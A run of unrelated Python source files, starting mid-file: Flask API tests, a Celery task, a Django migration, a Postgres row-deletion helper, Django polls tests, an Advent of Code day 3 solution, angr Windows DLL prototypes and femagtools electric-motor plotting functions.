    media_type = 'application/json; api-version="1.0"'


class JSONVersion2(renderers.JSONRenderer):
    media_type = 'application/json; api-version="2.0"'


@app.route('/set_status_and_headers/')
def set_status_and_headers():
    headers = {'Location': 'http://example.com/456'}
    return {'example': 'content'}, status.HTTP_201_CREATED, headers


@app.route('/set_headers/')
def set_headers():
    headers = {'Location': 'http://example.com/456'}
    return {'example': 'content'}, headers


@app.route('/make_response_view/')
def make_response_view():
    response = make_response({'example': 'content'})
    response.headers['Location'] = 'http://example.com/456'
    return response


@app.route('/api_exception/')
def api_exception():
    raise exceptions.PermissionDenied()


@app.route('/abort_view/')
def abort_view():
    abort(status.HTTP_403_FORBIDDEN)


@app.route('/options/')
def options_view():
    return {}


@app.route('/accepted_media_type/')
@set_renderers([JSONVersion2, JSONVersion1])
def accepted_media_type():
    return {'accepted_media_type': str(request.accepted_media_type)}


class AppTests(unittest.TestCase):
    def test_set_status_and_headers(self):
        with app.test_client() as client:
            response = client.get('/set_status_and_headers/')
            self.assertEqual(response.status_code, status.HTTP_201_CREATED)
            self.assertEqual(response.headers['Location'], 'http://example.com/456')
            self.assertEqual(response.content_type, 'application/json')
            expected = '{"example": "content"}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_set_headers(self):
        with app.test_client() as client:
            response = client.get('/set_headers/')
            self.assertEqual(response.status_code, status.HTTP_200_OK)
            self.assertEqual(response.headers['Location'], 'http://example.com/456')
            self.assertEqual(response.content_type, 'application/json')
            expected = '{"example": "content"}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_make_response(self):
        with app.test_client() as client:
            response = client.get('/make_response_view/')
            self.assertEqual(response.content_type, 'application/json')
            self.assertEqual(response.headers['Location'], 'http://example.com/456')
            self.assertEqual(response.content_type, 'application/json')
            expected = '{"example": "content"}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_api_exception(self):
        with app.test_client() as client:
            response = client.get('/api_exception/')
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
            self.assertEqual(response.content_type, 'application/json')
            expected = '{"message": "You do not have permission to perform this action."}'
            self.assertEqual(response.get_data().decode('utf8'), expected)

    def test_abort_view(self):
        with app.test_client() as client:
            response = client.get('/abort_view/')
            self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_options_view(self):
        with app.test_client() as client:
            response = client.options('/options/')
        # Errors if `response.response` is `None`
        response.get_data()

    def test_accepted_media_type_property(self):
        with app.test_client() as client:
            # Explicitly request the "api-version 1.0" renderer.
            headers = {'Accept': 'application/json; api-version="1.0"'}
            response = client.get('/accepted_media_type/', headers=headers)
            data = json.loads(response.get_data().decode('utf8'))
            expected = {'accepted_media_type': 'application/json; api-version="1.0"'}
            self.assertEqual(data, expected)

            # Request the default renderer, which is "api-version 2.0".
            headers = {'Accept': '*/*'}
            response = client.get('/accepted_media_type/', headers=headers)
            data = json.loads(response.get_data().decode('utf8'))
            expected = {'accepted_media_type': 'application/json; api-version="2.0"'}
            self.assertEqual(data, expected)

from celery.task import Task

import requests

class StracksFlushTask(Task):
    def run(self, url, data):
        requests.post(url + "/", data=data)


# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('freebasics', '0006_change_site_url_field_type'),
    ]

    operations = [
        migrations.AddField(
            model_name='freebasicscontroller',
            name='postgres_db_url',
            field=models.TextField(null=True, blank=True),
        ),
    ]

def excise(conn, qrelname, tid):
    with conn.cursor() as cur:
        # Assume 'id' column exists and print that for bookkeeping.
        #
        # TODO: Instead should find unique constraints and print
        # those, or try to print all attributes that are not corrupt.
        sql = 'DELETE FROM {0} WHERE ctid = %s RETURNING id'.format(qrelname)
        params = (tid,)

        cur.execute(sql, params)

        row = cur.fetchone()
        if row:
            return row[0]

        return None

import datetime

from django.utils import timezone
from django.test import TestCase
from django.urls import reverse

from .models import Question

class QuestionMethodTests(TestCase):

    def test_was_published_recently_with_future_question(self):
        """
        was_published_recently() should return False for questions whose
        pub_date is in the future.
        """
        time = timezone.now() + datetime.timedelta(days=30)
        future_question = Question(pub_date=time)
        self.assertIs(future_question.was_published_recently(), False)

    def test_was_published_recently_with_old_question(self):
        """
        was_published_recently() should return False for questions whose
        pub_date is older than 1 day.
        """
        time = timezone.now() - datetime.timedelta(days=30)
        old_question = Question(pub_date=time)
        self.assertIs(old_question.was_published_recently(), False)

    def test_was_published_recently_with_recent_question(self):
        """
        was_published_recently() should return True for questions whose
        pub_date is within the last day.
        """
        time = timezone.now() - datetime.timedelta(hours=1)
        recent_question = Question(pub_date=time)
        self.assertIs(recent_question.was_published_recently(), True)

def create_question(question_text, days):
    """
    Creates a question with the given `question_text` and published the
    given number of `days` offset to now (negative for questions published
    in the past, positive for questions that have yet to be published).
    """
    time = timezone.now() + datetime.timedelta(days=days)
    return Question.objects.create(question_text=question_text, pub_date=time)


class QuestionViewTests(TestCase):
    def test_index_view_with_no_questions(self):
        """
        If no questions exist, an appropriate message should be displayed.
        """
        response = self.client.get(reverse('polls:index'))
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "No polls are available.")
        self.assertQuerysetEqual(response.context['latest_question_list'], [])

    def test_index_view_with_a_past_question(self):
        """
        Questions with a pub_date in the past should be displayed on the
        index page.
        """
        create_question(question_text="Past question.", days=-30)
        response = self.client.get(reverse('polls:index'))
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question.>']
        )

    def test_index_view_with_a_future_question(self):
        """
        Questions with a pub_date in the future should not be displayed on
        the index page.
        """
        create_question(question_text="Future question.", days=30)
        response = self.client.get(reverse('polls:index'))
        self.assertContains(response, "No polls are available.")
        self.assertQuerysetEqual(response.context['latest_question_list'], [])

    def test_index_view_with_future_question_and_past_question(self):
        """
        Even if both past and future questions exist, only past questions
        should be displayed.
        """
        create_question(question_text="Past question.", days=-30)
        create_question(question_text="Future question.", days=30)
        response = self.client.get(reverse('polls:index'))
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question.>']
        )

    def test_index_view_with_two_past_questions(self):
        """
        The questions index page may display multiple questions.
        """
        create_question(question_text="Past question 1.", days=-30)
        create_question(question_text="Past question 2.", days=-5)
        response = self.client.get(reverse('polls:index'))
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question 2.>', '<Question: Past question 1.>']
        )

class QuestionIndexDetailTests(TestCase):
    def test_detail_view_with_a_future_question(self):
        """
        The detail view of a question with a pub_date in the future should
        return a 404 not found.
        """
        future_question = create_question(question_text='Future question.', days=5)
        url = reverse('polls:detail', args=(future_question.id,))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)

    def test_detail_view_with_a_past_question(self):
        """
        The detail view of a question with a pub_date in the past should
        display the question's text.
        """
        past_question = create_question(question_text='Past Question.', days=-5)
        url = reverse('polls:detail', args=(past_question.id,))
        response = self.client.get(url)
        self.assertContains(response, past_question.question_text)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""--- Day 3: Perfectly Spherical Houses in a Vacuum ---

Santa is delivering presents to an infinite two-dimensional grid of houses.

He begins by delivering a present to the house at his starting location, and
then an elf at the North Pole calls him via radio and tells him where to move
next. Moves are always exactly one house to the north (^), south (v), east (>),
or west (<). After each move, he delivers another present to the house at his
new location.

However, the elf back at the north pole has had a little too much eggnog, and
so his directions are a little off, and Santa ends up visiting some houses more
than once. How many houses receive at least one present?

For example:

- > delivers presents to 2 houses: one at the starting location, and one to the
east.
- ^>v< delivers presents to 4 houses in a square, including twice to the
house at his starting/ending location.
- ^v^v^v^v^v delivers a bunch of presents
to some very lucky children at only 2 houses.

--- Part Two ---

The next year, to speed up the process, Santa creates a robot version of
himself, Robo-Santa, to deliver presents with him.

Santa and Robo-Santa start at the same location (delivering two presents to the
same starting house), then take turns moving based on instructions from the
elf, who is eggnoggedly reading from the same script as the previous year.

This year, how many houses receive at least one present?

For example:
- ^v delivers presents to 3 houses, because Santa goes north, and then Robo-Santa
  goes south.
- ^>v< now delivers presents to 3 houses, and Santa and Robo-Santa
  end up back where they started.
- ^v^v^v^v^v now delivers presents to 11 houses,
  with Santa going one direction and Robo-Santa going the other.
"""
import sys

import click


def update_point(move, point):
    """Returns new point representing position after move"""
    moves = {
        '^': (0, -1),
        '<': (-1, 0),
        'v': (0, 1),
        '>': (1, 0),
    }
    return (point[0]+moves.get(move, (0, 0))[0],
            point[1]+moves.get(move, (0, 0))[1])


def map_single_delivery(text):
    point = (0, 0)
    points = set({point})
    for move in text:
        point = update_point(move, point)
        points.add(point)
    return points


def number_of_houses_covered(text, robo_santa=False):
    return len(map_single_delivery(text)) if not robo_santa else \
        len(map_multiple_deliveries(text))


def split_directions(directions):
    lists = ('', '')
    try:
        lists = directions[0::2], directions[1::2]
    except IndexError:
        pass
    return lists


def map_multiple_deliveries(text):
    directions = split_directions(text)
    points = map_single_delivery(directions[0])
    return points.union(map_single_delivery(directions[1]))


def calculate_solution_1(text):
    return number_of_houses_covered(text)


def calculate_solution_2(text):
    return number_of_houses_covered(text, robo_santa=True)


@click.command()
@click.option('--source_file', default='data/03.txt',
              help='source data file for problem')
def main(source_file):
    """Simple solution to adventofcode problem 3."""
    data = ''
    with open(source_file) as source:
        data = source.read()
    print('Santa gave at least one present to {} houses.'.format(
        number_of_houses_covered(data)))


if __name__ == "__main__":
    sys.exit(main())

# pylint:disable=line-too-long
import logging

from ...sim_type import SimTypeFunction,     SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat,     SimTypePointer,     SimTypeChar,     SimStruct,     SimTypeFixedSizeArray,     SimTypeBottom,     SimUnion,     SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary


_l = logging.getLogger(name=__name__)


lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("aclui.dll")
prototypes = \
    {
        # 
        'CreateSecurityPage': SimTypeFunction([SimTypeBottom(label="ISecurityInformation")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["psi"]),
        # 
        'EditSecurity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeBottom(label="ISecurityInformation")], SimTypeInt(signed=True, label="Int32"), arg_names=["hwndOwner", "psi"]),
        # 
        'EditSecurityAdvanced': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeBottom(label="ISecurityInformation"), SimTypeInt(signed=False, label="SI_PAGE_TYPE")], SimTypeInt(signed=True, label="Int32"), arg_names=["hwndOwner", "psi", "uSIPage"]),
    }

lib.set_prototypes(prototypes)

# -*- coding: utf-8 -*-
"""
    femagtools.plot
    ~~~~~~~~~~~~~~~

    Creating plots



"""
import numpy as np
import scipy.interpolate as ip
import logging

try:
    import matplotlib
    import matplotlib.pyplot as plt
    import matplotlib.cm as cm
    from mpl_toolkits.mplot3d import Axes3D
    matplotlibversion = matplotlib.__version__
except ImportError:   # ModuleNotFoundError:
    matplotlibversion = 0

logger = logging.getLogger("femagtools.plot")


def _create_3d_axis():
    """creates a subplot with 3d projection if one does not already exist"""
    from matplotlib.projections import get_projection_class
    from matplotlib import _pylab_helpers

    create_axis = True
    if _pylab_helpers.Gcf.get_active() is not None:
        if isinstance(plt.gca(), get_projection_class('3d')):
            create_axis = False
    if create_axis:
        plt.figure()
        plt.subplot(111, projection='3d')


def _plot_surface(ax, x, y, z, labels, azim=None):
    """helper function for surface plots"""
    # ax.tick_params(axis='both', which='major', pad=-3)
    assert np.size(x) > 1 and np.size(y) > 1 and np.size(z) > 1
    if azim is not None:
        ax.azim = azim
    X, Y = np.meshgrid(x, y)
    Z = np.ma.masked_invalid(z)
    ax.plot_surface(X, Y, Z,
                    rstride=1, cstride=1,
                    cmap=cm.viridis, alpha=0.85,
                    vmin=np.nanmin(z), vmax=np.nanmax(z),
                    linewidth=0, antialiased=True)
#                    edgecolor=(0, 0, 0, 0))
    # ax.set_xticks(xticks)
    # ax.set_yticks(yticks)
    # ax.set_zticks(zticks)
    ax.set_xlabel(labels[0])
    ax.set_ylabel(labels[1])
    ax.set_title(labels[2])

    # plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)


def __phasor_plot(ax, up, idq, uxdq):
    uref = max(up, uxdq[0])
    uxd = uxdq[0]/uref
    uxq = uxdq[1]/uref
    u1d, u1q = (uxd, 1+uxq)
    u1 = np.sqrt(u1d**2 + u1q**2)*uref
    i1 = np.linalg.norm(idq)
    i1d, i1q = (idq[0]/i1, idq[1]/i1)

    qhw = 6   # width arrow head
    qhl = 15  # length arrow head
    qlw = 2   # line width
    qts = 10  # textsize
    # Length of the Current adjust to Ud: Initally 0.9, Maier(Oswald) = 0.5
    curfac = max(0.9, 1.5*i1q/up)

    def label_line(ax, X, Y, U, V, label, color='k', size=8):
        """Add a label to a line, at the proper angle.

        Arguments
        ---------
        line : matplotlib.lines.Line2D object,
        label : str
        x : float
        x-position to place center of text (in data coordinated
        y : float
        y-position to place center of text (in data coordinates)
        color : str
        size : float
        """

        x1, x2 = X, X + U
        y1, y2 = Y, Y + V

        if y2 == 0:
            y2 = y1
        if x2 == 0:
            x2 = x1

        x = (x1 + x2) / 2
        y = (y1 + y2) / 2

        slope_degrees = np.rad2deg(np.angle(U + V * 1j))
        if slope_degrees < 0:
            slope_degrees += 180
        if 90 < slope_degrees <= 270:
            slope_degrees += 180

        x_offset = np.sin(np.deg2rad(slope_degrees))
        y_offset = np.cos(np.deg2rad(slope_degrees))
        bbox_props = dict(boxstyle="Round4, pad=0.1", fc="white", lw=0)
        text = ax.annotate(label, xy=(x, y), xytext=(x_offset * 10, y_offset * 8),
                           textcoords='offset points',
                           size=size, color=color,
                           horizontalalignment='center',
                           verticalalignment='center',
                           fontfamily='monospace', fontweight='bold', bbox=bbox_props)

        text.set_rotation(slope_degrees)
        return text

    if ax == 0:
        ax = plt.gca()
    ax.axes.xaxis.set_ticklabels([])
    ax.axes.yaxis.set_ticklabels([])
    # ax.set_aspect('equal')

    ax.set_title(
        r'$U_1$={0} V, $I_1$={1} A, $U_p$={2} V'.format(
            round(u1, 1), round(i1, 1), round(up, 1)), fontsize=14)

    up /= uref
    ax.quiver(0, 0, 0, up, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw/2, headlength=qhl/2, headaxislength=qhl/2, width=qlw*2, color='k')
    label_line(ax, 0, 0, 0, up, '$U_p$', 'k', qts)

    ax.quiver(0, 0, u1d, u1q, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='r')
    label_line(ax, 0, 0, u1d, u1q, '$U_1$', 'r', qts)

    ax.quiver(0, 1, uxd, 0, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='g')
    label_line(ax, 0, 1, uxd, 0, '$U_d$', 'g', qts)

    ax.quiver(uxd, 1, 0, uxq, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='g')
    label_line(ax, uxd, 1, 0, uxq, '$U_q$', 'g', qts)

    ax.quiver(0, 0, curfac*i1d, curfac*i1q, angles='xy', scale_units='xy', scale=1,
              units='dots', headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='b')
    label_line(ax, 0, 0, curfac*i1d, curfac*i1q, '$I_1$', 'b', qts)

    xmin, xmax = (min(0, uxd, i1d), max(0, i1d, uxd))
    ymin, ymax = (min(0, i1q, 1-uxq), max(1, i1q, 1+uxq))

    ax.set_xlim([xmin-0.1, xmax+0.1])
    ax.set_ylim([ymin-0.1, ymax+0.1])
    ax.grid(True)


def i1beta_phasor(up, i1, beta, r1, xd, xq, ax=0):
    """creates a phasor plot
    up: internal voltage
    i1: current
    beta: angle i1 vs up [deg]
    r1: resistance
    xd: reactance in direct axis
    xq: reactance in quadrature axis"""

    i1d, i1q = (i1*np.sin(beta/180*np.pi), i1*np.cos(beta/180*np.pi))
    uxdq = ((r1*i1d - xq*i1q), (r1*i1q + xd*i1d))
    __phasor_plot(ax, up, (i1d, i1q), uxdq)


def iqd_phasor(up, iqd, uqd, ax=0):
    """creates a phasor plot
    up: internal voltage
    iqd: current
    uqd: terminal voltage"""

    uxdq = (uqd[1]/np.sqrt(2), (uqd[0]/np.sqrt(2)-up))
    __phasor_plot(ax, up, (iqd[1]/np.sqrt(2), iqd[0]/np.sqrt(2)), uxdq)


def phasor(bch, ax=0):
    """create phasor plot from bch"""
    f1 = bch.machine['p']*bch.dqPar['speed']
    w1 = 2*np.pi*f1
    xd = w1*bch.dqPar['ld'][-1]
    xq = w1*bch.dqPar['lq'][-1]
    r1 = bch.machine['r1']
    i1beta_phasor(bch.dqPar['up'][-1],
                  bch.dqPar['i1'][-1], bch.dqPar['beta'][-1],
                  r1, xd, xq, ax)


def airgap(airgap, ax=0):
    """creates plot of flux density in airgap"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Airgap Flux Density [T]')
    ax.plot(airgap['pos'], airgap['B'],
            label='Max {:4.2f} T'.format(max(airgap['B'])))
    ax.plot(airgap['pos'], airgap['B_fft'],
            label='Base Ampl {:4.2f} T'.format(airgap['Bamp']))
    ax.set_xlabel('Position/°')
    ax.legend()
    ax.grid(True)


def airgap_fft(airgap, bmin=1e-2, ax=0):
    """plot airgap harmonics"""
    unit = 'T'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Airgap Flux Density Harmonics / {}'.format(unit))
    ax.grid(True)
    order, fluxdens = np.array([(n, b) for n, b in zip(airgap['nue'],
                                                       airgap['B_nue']) if b > bmin]).T
    try:
        markerline1, stemlines1, _ = ax.stem(order, fluxdens, '-.', basefmt=" ",
                                             use_line_collection=True)
        ax.set_xticks(order)
    except ValueError:  # empty sequence
        pass


def torque(pos, torque, ax=0):
    """creates plot from torque vs position"""
    k = 20
    alpha = np.linspace(pos[0], pos[-1],
                        k*len(torque))
    f = ip.interp1d(pos, torque, kind='quadratic')
    unit = 'Nm'
    scale = 1
    if np.min(torque) < -9.9e3 or np.max(torque) > 9.9e3:
        scale = 1e-3
        unit = 'kNm'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Torque / {}'.format(unit))
    ax.grid(True)
    ax.plot(pos, [scale*t for t in torque], 'go')
    ax.plot(alpha, scale*f(alpha))
    if np.min(torque) > 0 and np.max(torque) > 0:
        ax.set_ylim(bottom=0)
    elif np.min(torque) < 0 and np.max(torque) < 0:
        ax.set_ylim(top=0)


def torque_fft(order, torque, ax=0):
    """plot torque harmonics"""
    unit = 'Nm'
    scale = 1
    if np.min(torque) < -9.9e3 or np.max(torque) > 9.9e3:
        scale = 1e-3
        unit = 'kNm'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Torque Harmonics / {}'.format(unit))
    ax.grid(True)

    try:
        bw = 2.5E-2*max(order)
        ax.bar(order, [scale*t for t in torque], width=bw, align='center')
        ax.set_xlim(left=-bw/2)
    except ValueError:  # empty sequence
        pass


def force(title, pos, force, xlabel='', ax=0):
    """plot force vs position"""
    unit = 'N'
    scale = 1
    if min(force) < -9.9e3 or max(force) > 9.9e3:
        scale = 1e-3
        unit = 'kN'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('{} / {}'.format(title, unit))
    ax.grid(True)
    ax.plot(pos, [scale*f for f in force])
    if xlabel:
        ax.set_xlabel(xlabel)
    if min(force) > 0:
        ax.set_ylim(bottom=0)


def force_fft(order, force, ax=0):
    """plot force harmonics"""
    unit = 'N'
    scale = 1
    if min(force) < -9.9e3 or max(force) > 9.9e3:
        scale = 1e-3
        unit = 'kN'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Force Harmonics / {}'.format(unit))
    ax.grid(True)
    try:
        bw = 2.5E-2*max(order)
        ax.bar(order, [scale*t for t in force], width=bw, align='center')
        ax.set_xlim(left=-bw/2)
    except ValueError:  # empty sequence
        pass


def forcedens(title, pos, fdens, ax=0):
    """plot force densities"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title(title)
    ax.grid(True)

    ax.plot(pos, [1e-3*ft for ft in fdens[0]], label='F tang')
    ax.plot(pos, [1e-3*fn for fn in fdens[1]], label='F norm')
    ax.legend()
    ax.set_xlabel('Pos / deg')
    ax.set_ylabel('Force Density / kN/m²')


def forcedens_surface(fdens, ax=0):
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    xpos = [p for p in fdens.positions[0]['X']]
    ypos = [p['position'] for p in fdens.positions]
    z = 1e-3*np.array([p['FN']
                       for p in fdens.positions])
    _plot_surface(ax, xpos, ypos, z,
                  (u'Rotor pos/°', u'Pos/°', u'F N / kN/m²'))


def forcedens_fft(title, fdens, ax=0):
    """plot force densities FFT
    Args:
      title: plot title
      fdens: force density object
    """
    if ax == 0:
        ax = plt.axes(projection="3d")

    F = 1e-3*fdens.fft()
    fmin = 0.2
    num_bars = F.shape[0] + 1
    _xx, _yy = np.meshgrid(np.arange(1, num_bars),
                           np.arange(1, num_bars))
    z_size = F[F > fmin]
    x_pos, y_pos = _xx[F > fmin], _yy[F > fmin]
    z_pos = np.zeros_like(z_size)
    x_size = 2
    y_size = 2

    ax.bar3d(x_pos, y_pos, z_pos, x_size, y_size, z_size)
    ax.view_init(azim=120)
    ax.set_xlim(0, num_bars+1)
    ax.set_ylim(0, num_bars+1)
    ax.set_title(title)
    ax.set_xlabel('M')
    ax.set_ylabel('N')
    ax.set_zlabel('kN/m²')


def winding_flux(pos, flux, ax=0):
    """plot flux vs position"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Winding Flux / Vs')
    ax.grid(True)
    for p, f in zip(pos, flux):
        ax.plot(p, f)


def winding_current(pos, current, ax=0):
    """plot winding currents"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Winding Currents / A')
    ax.grid(True)
    for p, i in zip(pos, current):
        ax.plot(p, i)


def voltage(title, pos, voltage, ax=0):
    """plot voltage vs. position"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('{} / V'.format(title))
    ax.grid(True)
    ax.plot(pos, voltage)


def voltage_fft(title, order, voltage, ax=0):
    """plot FFT harmonics of voltage"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('{} / V'.format(title))
    ax.grid(True)
    if max(order) < 5:
        order += [5]
        voltage += [0]
    try:
        bw = 2.5E-2*max(order)
        ax.bar(order, voltage, width=bw, align='center')
    except ValueError:  # empty sequence
        pass


def mcv_hbj(mcv, log=True, ax=0):
    """plot H, B, J of mcv dict"""
    import femagtools.mcv
    MUE0 = 4e-7*np.pi
    ji = []

    csiz = len(mcv['curve'])
    if ax == 0:
        ax = plt.gca()
    ax.set_title(mcv['name'])
    for k, c in enumerate(mcv['curve']):
        bh = [(bi, hi*1e-3)
              for bi, hi in zip(c['bi'],
                                c['hi'])]
        try:
            if csiz == 1 and mcv['ctype'] in (femagtools.mcv.MAGCRV,
                                              femagtools.mcv.ORIENT_CRV):
                ji = [b-MUE0*h*1e3 for b, h in bh]
        except Exception:
            pass
        bi, hi = zip(*bh)

        label = 'Flux Density'
        if csiz > 1:
            label = 'Flux Density ({0}°)'.format(mcv.mc1_angle[k])
        if log:
            ax.semilogx(hi, bi, label=label)
            if ji:
                ax.semilogx(hi, ji, label='Polarisation')
        else:
            ax.plot(hi, bi, label=label)
            if ji:
                ax.plot(hi, ji, label='Polarisation')
    ax.set_xlabel('H / kA/m')
    ax.set_ylabel('T')
    if ji or csiz > 1:
        ax.legend(loc='lower right')
    ax.grid()


def mcv_muer(mcv, ax=0):
    """plot rel. permeability vs. B of mcv dict"""
    MUE0 = 4e-7*np.pi
    bi, ur = zip(*[(bx, bx/hx/MUE0)
                   for bx, hx in zip(mcv['curve'][0]['bi'],
                                     mcv['curve'][0]['hi']) if not hx == 0])
    if ax == 0:
        ax = plt.gca()
    ax.plot(bi, ur)
    ax.set_xlabel('B / T')
    ax.set_title('rel. Permeability')
    ax.grid()


def mtpa(pmrel, i1max, title='', projection='', ax=0):
    """create a line or surface plot with torque and mtpa curve"""
    nsamples = 10
    i1 = np.linspace(0, i1max, nsamples)
    iopt = np.array([pmrel.mtpa(x) for x in i1]).T

    iqmax, idmax = pmrel.iqdmax(i1max)
    iqmin, idmin = pmrel.iqdmin(i1max)

    if projection == '3d':
        nsamples = 50
    else:
        if iqmin == 0:
            iqmin = 0.1*iqmax
    id = np.linspace(idmin, idmax, nsamples)
    iq = np.linspace(iqmin, iqmax, nsamples)

    torque_iqd = np.array(
        [[pmrel.torque_iqd(x, y)
          for y in id] for x in iq])
    if projection == '3d':
        ax = idq_torque(id, iq, torque_iqd, ax)
        ax.plot(iopt[1], iopt[0], iopt[2],
                color='red', linewidth=2, label='MTPA: {0:5.0f} Nm'.format(
                    np.max(iopt[2][-1])))
    else:
        if ax == 0:
            ax = plt.gca()

        ax.set_aspect('equal')
        x, y = np.meshgrid(id, iq)
        CS = ax.contour(x, y, torque_iqd, 6, colors='k')
        ax.clabel(CS, fmt='%d', inline=1)

        ax.set_xlabel('Id/A')
        ax.set_ylabel('Iq/A')
        ax.plot(iopt[1], iopt[0],
                color='red', linewidth=2, label='MTPA: {0:5.0f} Nm'.format(
                    np.max(iopt[2][-1])))
        ax.grid()

    if title:
        ax.set_title(title)
    ax.legend()


def mtpv(pmrel, u1max, i1max, title='', projection='', ax=0):
    """create a line or surface plot with voltage and mtpv curve"""
    w1 = pmrel.w2_imax_umax(i1max, u1max)
    nsamples = 20
    if projection == '3d':
        nsamples = 50

    iqmax, idmax = pmrel.iqdmax(i1max)
    iqmin, idmin = pmrel.iqdmin(i1max)
    id = np.linspace(idmin, idmax, nsamples)
    iq = np.linspace(iqmin, iqmax, nsamples)
    u1_iqd = np.array(
        [[np.linalg.norm(pmrel.uqd(w1, iqx, idx))/np.sqrt(2)
          for idx in id] for iqx in iq])
    u1 = np.mean(u1_iqd)
    imtpv = np.array([pmrel.mtpv(wx, u1, i1max)
                      for wx in np.linspace(w1, 20*w1, nsamples)]).T

    if projection == '3d':
        torque_iqd = np.array(
            [[pmrel.torque_iqd(x, y)
              for y in id] for x in iq])
        ax = idq_torque(id, iq, torque_iqd, ax)
        ax.plot(imtpv[1], imtpv[0], imtpv[2],
                color='red', linewidth=2)
    else:
        if ax == 0:
            ax = plt.gca()
        ax.set_aspect('equal')
        x, y = np.meshgrid(id, iq)
        CS = ax.contour(x, y, u1_iqd, 4, colors='b')  # linestyles='dashed')
        ax.clabel(CS, fmt='%d', inline=1)

        ax.plot(imtpv[1], imtpv[0],
                color='red', linewidth=2,
                label='MTPV: {0:5.0f} Nm'.format(np.max(imtpv[2])))
        # beta = np.arctan2(imtpv[1][0], imtpv[0][0])
        # b = np.linspace(beta, 0)
        # ax.plot(np.sqrt(2)*i1max*np.sin(b), np.sqrt(2)*i1max*np.cos(b), 'r-')

        ax.grid()
        ax.legend()
    ax.set_xlabel('Id/A')
    ax.set_ylabel('Iq/A')
    if title:
        ax.set_title(title)


def __get_linearForce_title_keys(lf):
    if 'force_r' in lf:
        return ['Force r', 'Force z'], ['force_r', 'force_z']
    return ['Force x', 'Force y'], ['force_x', 'force_y']


def pmrelsim(bch, title=''):
    """creates a plot of a PM/Rel motor simulation"""
    cols = 2
    rows = 4
    if len(bch.flux['1']) > 1:
        rows += 1
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
        torque(bch.torque[-1]['angle'], bch.torque[-1]['torque'])
        plt.subplot(rows, cols, row+1)
        tq = list(bch.torque_fft[-1]['torque'])
        order = list(bch.torque_fft[-1]['order'])
        if order and max(order) < 5:
            order += [15]
            tq += [0]
        torque_fft(order, tq)
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[-1]['angle'], bch.torque[-1]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[-1]['angle'], bch.torque[-1]['force_y'])
        row += 3
    elif bch.linearForce:
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    plt.subplot(rows, cols, row+1)
    flux = [bch.flux[k][-1] for k in bch.flux]
    pos = [f['displ'] for f in flux]
    winding_flux(pos,
                 [f['flux_k'] for f in flux])
    plt.subplot(rows, cols, row+2)
    winding_current(pos,
                    [f['current_k'] for f in flux])
    plt.subplot(rows, cols, row+3)
    voltage('Internal Voltage',
            bch.flux['1'][-1]['displ'],
            bch.flux['1'][-1]['voltage_dpsi'])
    plt.subplot(rows, cols, row+4)
    try:
        voltage_fft('Internal Voltage Harmonics',
                    bch.flux_fft['1'][-1]['order'],
                    bch.flux_fft['1'][-1]['voltage'])
    except:
        pass
    if len(bch.flux['1']) > 1:
        plt.subplot(rows, cols, row+5)
        voltage('No Load Voltage',
                bch.flux['1'][0]['displ'],
                bch.flux['1'][0]['voltage_dpsi'])
